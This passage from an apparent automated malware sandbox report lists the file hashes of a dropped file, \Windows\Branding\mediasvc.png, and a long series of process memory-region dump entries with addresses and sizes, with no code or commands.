                                                                                                  9f273a77d434807138c884cc95deb1cadea1ff6db492839d238759a265f3b0ded318b6af59d0743f8dd1555e968afb1eca9ba92a214ecd247480d2a072c08540

                                                                                                • \Windows\Branding\mediasvc.png

                                                                                                  MD5

                                                                                                  2ee3d03bb1f8bd257235fc70e92b17e1

                                                                                                  SHA1

                                                                                                  c36482b8f8229578dec1cc687aaf53084cb6d05e

                                                                                                  SHA256

                                                                                                  b7a9b4269995093c63efe64cb65e4562680af2fdf7c4dfdc235f2eb60c469ff0

                                                                                                  SHA512

                                                                                                  39f8a42a512e4bfbf84ac3c472bf9444a139da23b7007f57aa68dc9ba9db5466b7f155df18c0a49e3073527763ef459180ab1912e53453d312c17718ab67abea

                                                                                                • memory/820-160-0x0000000000000000-mapping.dmp

                                                                                                • memory/1016-300-0x0000028C9D530000-0x0000028C9D540000-memory.dmp

                                                                                                  Filesize

                                                                                                  64KB

                                                                                                • memory/1016-303-0x0000028C9D896000-0x0000028C9D897000-memory.dmp

                                                                                                  Filesize

                                                                                                  4KB

                                                                                                • memory/1016-302-0x0000028C9D893000-0x0000028C9D895000-memory.dmp

                                                                                                  Filesize

                                                                                                  8KB

                                                                                                • memory/1016-301-0x0000028C9D890000-0x0000028C9D892000-memory.dmp

                                                                                                  Filesize

                                                                                                  8KB

                                                                                                • memory/1060-249-0x0000022F46DE0000-0x0000022F471DF000-memory.dmp

                                                                                                  Filesize

                                                                                                  4.0MB

                                                                                                • memory/1060-258-0x0000022F469C3000-0x0000022F469C5000-memory.dmp

                                                                                                  Filesize

                                                                                                  8KB

                                                                                                • memory/1060-248-0x0000022F469C0000-0x0000022F469C2000-memory.dmp

                                                                                                  Filesize

                                                                                                  8KB

                                                                                                • memory/1060-231-0x00000000011F0000-0x0000000002036000-memory.dmp

                                                                                                  Filesize

                                                                                                  14.3MB

                                                                                                • memory/1060-260-0x0000022F469C5000-0x0000022F469C6000-memory.dmp

                                                                                                  Filesize

                                                                                                  4KB

                                                                                                • memory/1060-228-0x0000000000000000-mapping.dmp

                                                                                                • memory/1060-261-0x0000022F469C6000-0x0000022F469C7000-memory.dmp

                                                                                                  Filesize

                                                                                                  4KB

                                                                                                • memory/1092-262-0x0000000076EB0000-0x000000007703E000-memory.dmp

                                                                                                  Filesize

                                                                                                  1.6MB

                                                                                                • memory/1092-259-0x0000000000400000-0x0000000000B71000-memory.dmp

                                                                                                  Filesize

                                                                                                  7.4MB

                                                                                                • memory/1092-256-0x0000000000400000-0x0000000000B71000-memory.dmp

                                                                                                  Filesize

                                                                                                  7.4MB

                                                                                                • memory/1092-255-0x0000000000400000-0x0000000000B71000-memory.dmp

                                                                                                  Filesize

                                                                                                  7.4MB

                                                                                                • memory/1092-257-0x0000000000400000-0x0000000000B71000-memory.dmp

                                                                                                  Filesize

                                                                                                  7.4MB

                                                                                                • memory/1092-254-0x0000000000400000-0x0000000000B71000-memory.dmp

                                                                                                  Filesize

                                                                                                  7.4MB

                                                                                                • memory/1092-250-0x0000000000000000-mapping.dmp

                                                                                                • memory/1124-134-0x0000000005F20000-0x0000000005F21000-memory.dmp

                                                                                                  Filesize

                                                                                                  4KB

                                                                                                • memory/1124-142-0x00000000059B0000-0x00000000059B1000-memory.dmp

                                                                                                  Filesize

                                                                                                  4KB

                                                                                                • memory/1124-220-0x0000000007100000-0x0000000007101000-memory.dmp

                                                                                                  Filesize

                                                                                                  4KB

                                                                                                • memory/1124-143-0x00000000036E0000-0x00000000036E1000-memory.dmp

                                                                                                  Filesize

                                                                                                  4KB

                                                                                                • memory/1124-141-0x0000000005970000-0x0000000005971000-memory.dmp

                                                                                                  Filesize

                                                                                                  4KB

                                                                                                • memory/1124-139-0x0000000005A40000-0x0000000005A41000-memory.dmp

                                                                                                  Filesize

                                                                                                  4KB

                                                                                                • memory/1124-135-0x0000000005910000-0x0000000005911000-memory.dmp

                                                                                                  Filesize

                                                                                                  4KB

                                                                                                • memory/1124-132-0x00000000009A0000-0x00000000009A1000-memory.dmp

                                                                                                  Filesize

                                                                                                  4KB

                                                                                                • memory/1124-129-0x0000000076EB0000-0x000000007703E000-memory.dmp

                                                                                                  Filesize

                                                                                                  1.6MB

                                                                                                • memory/1124-127-0x0000000000000000-mapping.dmp

                                                                                                • memory/1188-388-0x0000000003310000-0x0000000003311000-memory.dmp

                                                                                                  Filesize

                                                                                                  4KB

                                                                                                • memory/1188-385-0x0000000076EB0000-0x000000007703E000-memory.dmp

                                                                                                  Filesize

                                                                                                  1.6MB

                                                                                                • memory/1188-313-0x0000000000000000-mapping.dmp

                                                                                                • memory/1312-728-0x0000000000000000-mapping.dmp

                                                                                                • memory/1312-179-0x00000000017D0000-0x000000000191A000-memory.dmp

                                                                                                  Filesize

                                                                                                  1.3MB

                                                                                                • memory/1312-180-0x0000000000400000-0x0000000001735000-memory.dmp

                                                                                                  Filesize

                                                                                                  19.2MB

                                                                                                • memory/1312-172-0x00000000019A6000-0x0000000001A23000-memory.dmp

                                                                                                  Filesize

                                                                                                  500KB

                                                                                                • memory/1312-169-0x0000000000000000-mapping.dmp

                                                                                                • memory/1332-216-0x0000000000000000-mapping.dmp

                                                                                                • memory/1356-298-0x0000000000000000-mapping.dmp

                                                                                                • memory/1356-312-0x000001E6708D3000-0x000001E6708D5000-memory.dmp

                                                                                                  Filesize

                                                                                                  8KB

                                                                                                • memory/1356-311-0x000001E6708D0000-0x000001E6708D2000-memory.dmp

                                                                                                  Filesize

                                                                                                  8KB

                                                                                                • memory/1356-333-0x000001E6708D6000-0x000001E6708D8000-memory.dmp

                                                                                                  Filesize

                                                                                                  8KB

                                                                                                • memory/1356-352-0x000001E6708D8000-0x000001E6708D9000-memory.dmp

                                                                                                  Filesize

                                                                                                  4KB

                                                                                                • memory/1428-209-0x0000000000000000-mapping.dmp

                                                                                                • memory/1652-416-0x0000027B69260000-0x0000027B69262000-memory.dmp

                                                                                                  Filesize

                                                                                                  8KB

                                                                                                • memory/1652-407-0x0000000000000000-mapping.dmp

                                                                                                • memory/1652-417-0x0000027B69263000-0x0000027B69265000-memory.dmp

                                                                                                  Filesize

                                                                                                  8KB

                                                                                                • memory/1652-448-0x0000027B69266000-0x0000027B69268000-memory.dmp

                                                                                                  Filesize

                                                                                                  8KB

                                                                                                • memory/1816-397-0x0000000000000000-mapping.dmp

                                                                                                • memory/1960-148-0x0000000000400000-0x00000000016C8000-memory.dmp

                                                                                                  Filesize

                                                                                                  18.8MB

                                                                                                • memory/1960-146-0x00000000032B0000-0x00000000032C3000-memory.dmp

                                                                                                  Filesize

                                                                                                  76KB

                                                                                                • memory/1960-140-0x0000000001A26000-0x0000000001A37000-memory.dmp

                                                                                                  Filesize

                                                                                                  68KB

                                                                                                • memory/1960-136-0x0000000000000000-mapping.dmp

                                                                                                • memory/2068-207-0x0000000005E80000-0x0000000005E81000-memory.dmp

                                                                                                  Filesize

                                                                                                  4KB

                                                                                                • memory/2068-185-0x0000000000000000-mapping.dmp

                                                                                                • memory/2068-192-0x0000000000CA0000-0x0000000000CA1000-memory.dmp

                                                                                                  Filesize

                                                                                                  4KB

                                                                                                • memory/2068-197-0x0000000076EB0000-0x000000007703E000-memory.dmp

                                                                                                  Filesize

                                                                                                  1.6MB

                                                                                                • memory/2172-122-0x0000000001976000-0x0000000001987000-memory.dmp

                                                                                                  Filesize

                                                                                                  68KB

                                                                                                • memory/2172-119-0x0000000000000000-mapping.dmp

                                                                                                • memory/2172-126-0x00000000016D0000-0x000000000181A000-memory.dmp

                                                                                                  Filesize

                                                                                                  1.3MB

                                                                                                • memory/2180-332-0x0000000000000000-mapping.dmp

                                                                                                • memory/2204-214-0x00000000032F0000-0x000000000337E000-memory.dmp

                                                                                                  Filesize

                                                                                                  568KB

                                                                                                • memory/2204-215-0x0000000000400000-0x0000000001707000-memory.dmp

                                                                                                  Filesize

                                                                                                  19.0MB

                                                                                                • memory/2204-202-0x0000000000000000-mapping.dmp

                                                                                                • memory/2204-206-0x0000000001AF6000-0x0000000001B45000-memory.dmp

                                                                                                  Filesize

                                                                                                  316KB

                                                                                                • memory/2220-726-0x0000000000000000-mapping.dmp

                                                                                                • memory/2272-358-0x0000000076EB0000-0x000000007703E000-memory.dmp

                                                                                                  Filesize

                                                                                                  1.6MB

                                                                                                • memory/2272-349-0x0000000000000000-mapping.dmp

                                                                                                • memory/2272-391-0x00000000052E0000-0x00000000052E1000-memory.dmp

                                                                                                  Filesize

                                                                                                  4KB

                                                                                                • memory/2292-382-0x000002222BA73000-0x000002222BA75000-memory.dmp

                                                                                                  Filesize

                                                                                                  8KB

                                                                                                • memory/2292-357-0x0000022229B40000-0x0000022229D60000-memory.dmp

                                                                                                  Filesize

                                                                                                  2.1MB

                                                                                                • memory/2292-386-0x000002222BA76000-0x000002222BA77000-memory.dmp

                                                                                                  Filesize

                                                                                                  4KB

                                                                                                • memory/2292-360-0x000002222BA70000-0x000002222BA72000-memory.dmp

                                                                                                  Filesize

                                                                                                  8KB

                                                                                                • memory/2292-338-0x0000000000000000-mapping.dmp

                                                                                                • memory/2296-181-0x0000000000230000-0x0000000000245000-memory.dmp

                                                                                                  Filesize

                                                                                                  84KB

                                                                                                • memory/2296-183-0x0000000000140000-0x0000000000141000-memory.dmp

                                                                                                  Filesize

                                                                                                  4KB

                                                                                                • memory/2296-182-0x0000000000239A6B-mapping.dmp

                                                                                                • memory/2296-184-0x0000000000140000-0x0000000000141000-memory.dmp

                                                                                                  Filesize

                                                                                                  4KB

                                                                                                • memory/2360-173-0x0000000000000000-mapping.dmp

                                                                                                • memory/2380-331-0x0000000000000000-mapping.dmp

                                                                                                • memory/2592-640-0x000001F67D7A0000-0x000001F67D7A2000-memory.dmp

                                                                                                  Filesize

                                                                                                  8KB

                                                                                                • memory/2592-642-0x000001F67D7A6000-0x000001F67D7A7000-memory.dmp

                                                                                                  Filesize

                                                                                                  4KB

                                                                                                • memory/2592-641-0x000001F67D7A3000-0x000001F67D7A5000-memory.dmp

                                                                                                  Filesize

                                                                                                  8KB

                                                                                                • memory/2608-389-0x0000000000000000-mapping.dmp

                                                                                                • memory/2608-280-0x0000000000000000-mapping.dmp

                                                                                                • memory/2616-727-0x0000000000000000-mapping.dmp

                                                                                                • memory/2652-167-0x0000000000000000-mapping.dmp

                                                                                                • memory/2808-176-0x00000000018B0000-0x00000000018C1000-memory.dmp

                                                                                                  Filesize

                                                                                                  68KB

                                                                                                • memory/2808-187-0x0000000000400000-0x00000000016C8000-memory.dmp

                                                                                                  Filesize

                                                                                                  18.8MB

                                                                                                • memory/2892-729-0x0000000000000000-mapping.dmp

                                                                                                • memory/3000-616-0x0000000000EF0000-0x0000000000F06000-memory.dmp

                                                                                                  Filesize

                                                                                                  88KB

                                                                                                • memory/3000-118-0x0000000000D50000-0x0000000000D66000-memory.dmp

                                                                                                  Filesize

                                                                                                  88KB

                                                                                                • memory/3000-147-0x0000000002F60000-0x0000000002F76000-memory.dmp

                                                                                                  Filesize

                                                                                                  88KB

                                                                                                • memory/3124-144-0x0000000000000000-mapping.dmp

                                                                                                • memory/3124-158-0x0000000076EB0000-0x000000007703E000-memory.dmp

                                                                                                  Filesize

                                                                                                  1.6MB

                                                                                                • memory/3124-189-0x00000000064D0000-0x00000000064D1000-memory.dmp

                                                                                                  Filesize

                                                                                                  4KB

                                                                                                • memory/3124-188-0x0000000006960000-0x0000000006961000-memory.dmp

                                                                                                  Filesize

                                                                                                  4KB

                                                                                                • memory/3124-208-0x0000000006C80000-0x0000000006C81000-memory.dmp

                                                                                                  Filesize

                                                                                                  4KB

                                                                                                • memory/3124-205-0x00000000068D0000-0x00000000068D1000-memory.dmp

                                                                                                  Filesize

                                                                                                  4KB

                                                                                                • memory/3124-195-0x0000000007030000-0x0000000007031000-memory.dmp

                                                                                                  Filesize

                                                                                                  4KB

                                                                                                • memory/3124-151-0x0000000000AB0000-0x0000000000AB1000-memory.dmp

                                                                                                  Filesize

                                                                                                  4KB

                                                                                                • memory/3124-159-0x00000000054A0000-0x00000000054A1000-memory.dmp

                                                                                                  Filesize

                                                                                                  4KB

                                                                                                • memory/3124-193-0x0000000006830000-0x0000000006831000-memory.dmp

                                                                                                  Filesize

                                                                                                  4KB

                                                                                                • memory/3124-226-0x00000000075B0000-0x00000000075B1000-memory.dmp

                                                                                                  Filesize

                                                                                                  4KB

                                                                                                • memory/3148-656-0x000002376B7F0000-0x000002376B7F6000-memory.dmp

                                                                                                  Filesize

                                                                                                  24KB

                                                                                                • memory/3156-636-0x0000000000000000-mapping.dmp

                                                                                                • memory/3200-162-0x0000000000000000-mapping.dmp

                                                                                                • memory/3200-166-0x00000000019B6000-0x0000000001A05000-memory.dmp

                                                                                                  Filesize

                                                                                                  316KB

                                                                                                • memory/3200-178-0x0000000000400000-0x0000000001708000-memory.dmp

                                                                                                  Filesize

                                                                                                  19.0MB

                                                                                                • memory/3200-177-0x0000000003340000-0x00000000033CE000-memory.dmp

                                                                                                  Filesize

                                                                                                  568KB

                                                                                                • memory/3384-174-0x0000000000000000-mapping.dmp

                                                                                                • memory/3508-247-0x0000000002700000-0x00000000027F1000-memory.dmp

                                                                                                  Filesize

                                                                                                  964KB

                                                                                                • memory/3508-244-0x000000000279259C-mapping.dmp

                                                                                                • memory/3508-232-0x0000000002700000-0x00000000027F1000-memory.dmp

                                                                                                  Filesize

                                                                                                  964KB

                                                                                                • memory/3528-161-0x0000000000000000-mapping.dmp

                                                                                                • memory/3568-218-0x0000000000000000-mapping.dmp

                                                                                                • memory/3760-270-0x0000000005330000-0x000000000582E000-memory.dmp

                                                                                                  Filesize

                                                                                                  5.0MB

                                                                                                • memory/3760-263-0x0000000000000000-mapping.dmp

                                                                                                • memory/3828-217-0x0000000000000000-mapping.dmp

                                                                                                • memory/3840-321-0x0000000000000000-mapping.dmp

                                                                                                • memory/3844-116-0x0000000000400000-0x0000000000409000-memory.dmp

                                                                                                  Filesize

                                                                                                  36KB

                                                                                                • memory/3844-117-0x0000000000402DF8-mapping.dmp

                                                                                                • memory/3920-114-0x0000000001946000-0x0000000001957000-memory.dmp

                                                                                                  Filesize

                                                                                                  68KB

                                                                                                • memory/3920-115-0x00000000017B0000-0x00000000017B9000-memory.dmp

                                                                                                  Filesize

                                                                                                  36KB

                                                                                                • memory/3920-676-0x0000000000000000-mapping.dmp

                                                                                                • memory/3944-342-0x0000000000400000-0x00000000057BA000-memory.dmp

                                                                                                  Filesize

                                                                                                  83.7MB

                                                                                                • memory/3944-337-0x00000000074C0000-0x000000000C81C000-memory.dmp

                                                                                                  Filesize

                                                                                                  83.4MB

                                                                                                • memory/3944-328-0x0000000000000000-mapping.dmp

                                                                                                • memory/3956-168-0x0000000000000000-mapping.dmp

                                                                                                • memory/3968-406-0x0000000000000000-mapping.dmp

                                                                                                • memory/4064-124-0x0000000000402DF8-mapping.dmp

                                                                                                • memory/4100-651-0x0000000000720000-0x0000000000740000-memory.dmp

                                                                                                  Filesize

                                                                                                  128KB

                                                                                                • memory/4100-645-0x000000014030F3F8-mapping.dmp

                                                                                                • memory/4100-648-0x0000000140000000-0x0000000140786000-memory.dmp

                                                                                                  Filesize

                                                                                                  7.5MB

                                                                                                • memory/4116-730-0x0000000000000000-mapping.dmp

                                                                                                • memory/4124-735-0x0000000000000000-mapping.dmp

                                                                                                • memory/4244-446-0x0000000000402DF8-mapping.dmp

                                                                                                • memory/4424-471-0x0000000000000000-mapping.dmp

                                                                                                • memory/4472-474-0x0000000000000000-mapping.dmp

                                                                                                • memory/4576-486-0x0000000000000000-mapping.dmp

                                                                                                • memory/4576-492-0x000001AEDCC80000-0x000001AEDCC82000-memory.dmp

                                                                                                  Filesize

                                                                                                  8KB

                                                                                                • memory/4576-493-0x000001AEDCC83000-0x000001AEDCC85000-memory.dmp

                                                                                                  Filesize

                                                                                                  8KB

                                                                                                • memory/4576-521-0x000001AEDCC86000-0x000001AEDCC88000-memory.dmp

                                                                                                  Filesize

                                                                                                  8KB

                                                                                                • memory/4604-718-0x0000000000000000-mapping.dmp

                                                                                                • memory/4660-678-0x0000000000000000-mapping.dmp

                                                                                                • memory/4724-664-0x0000000000000000-mapping.dmp

                                                                                                • memory/4752-524-0x00000261117F6000-0x00000261117F7000-memory.dmp

                                                                                                  Filesize

                                                                                                  4KB

                                                                                                • memory/4752-527-0x00000261117F0000-0x00000261117F2000-memory.dmp

                                                                                                  Filesize

                                                                                                  8KB

                                                                                                • memory/4752-529-0x00000261117F3000-0x00000261117F5000-memory.dmp

                                                                                                  Filesize

                                                                                                  8KB

                                                                                                • memory/4764-733-0x0000000000000000-mapping.dmp

                                                                                                • memory/4896-734-0x0000000000000000-mapping.dmp

                                                                                                • memory/4988-719-0x0000000000000000-mapping.dmp

                                                                                                • memory/5020-551-0x0000000000000000-mapping.dmp

                                                                                                • memory/5036-723-0x0000000000000000-mapping.dmp

                                                                                                • memory/5048-576-0x000002C0296C0000-0x000002C0296C2000-memory.dmp

                                                                                                  Filesize

                                                                                                  8KB

                                                                                                • memory/5048-555-0x0000000000000000-mapping.dmp

                                                                                                • memory/5048-578-0x000002C0296C3000-0x000002C0296C5000-memory.dmp

                                                                                                  Filesize

                                                                                                  8KB

                                                                                                • memory/5048-605-0x000002C0296C6000-0x000002C0296C8000-memory.dmp

                                                                                                  Filesize

                                                                                                  8KB

                                                                                                • memory/5048-615-0x000002C0296C8000-0x000002C0296CA000-memory.dmp

                                                                                                  Filesize

                                                                                                  8KB

                                                                                                • memory/5056-724-0x0000000000000000-mapping.dmp

                                                                                                • memory/5060-737-0x0000000000000000-mapping.dmp

                                                                                                • memory/5100-736-0x0000000000000000-mapping.dmp

                                                                                                • memory/5108-725-0x0000000000000000-mapping.dmp